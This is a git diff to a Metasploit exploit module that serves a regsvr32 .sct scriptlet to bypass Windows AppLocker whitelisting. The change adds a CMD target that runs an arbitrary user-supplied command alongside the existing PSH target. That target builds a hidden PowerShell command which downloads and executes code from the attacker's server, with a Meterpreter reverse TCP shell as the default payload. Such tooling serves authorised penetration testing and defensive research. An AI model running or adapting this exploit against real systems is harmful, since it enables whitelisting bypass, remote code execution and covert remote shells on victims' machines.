diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb index eca031fc1a..2dcaaaa5fd 100644 --- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb +++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb @@ -32,7 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote { 'Payload' => 'windows/meterpreter/reverse_tcp' }, - 'Targets' => [['Windows', {}]], + 'Targets' => [ + ['PSH', {}], + ['CMD', {}] + ], 'Platform' => %w(win), 'Arch' => [ARCH_X86, ARCH_X86_64], 'DefaultTarget' => 0, @@ -42,6 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html'] ] )) + register_options( + [ + OptString.new('CMD',[false, 'The command to execute (For use with the CMD Target option only)','']) + ]) end @@ -66,15 +73,20 @@ class MetasploitModule < Msf::Exploit::Remote def serve_sct_file print_status("Handling request for the .sct file from #{cli.peerhost}") url = get_uri - ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl - download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) - download_and_run = "#{ignore_cert}#{download_string}" - psh_command = generate_psh_command_line( - noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) - data = gen_sct_file(psh_command) + case target.name + when 'PSH' + ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl + download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) + download_and_run = "#{ignore_cert}#{download_string}" + psh_command = generate_psh_command_line( + noprofile: true, + windowstyle: 'hidden', + command: download_and_run + ) + data = gen_sct_file(psh_command) + when 'CMD' + data = gen_sct_file(datastore['CMD']) + end send_response(cli, data, 'Content-Type' => 'text/plain') end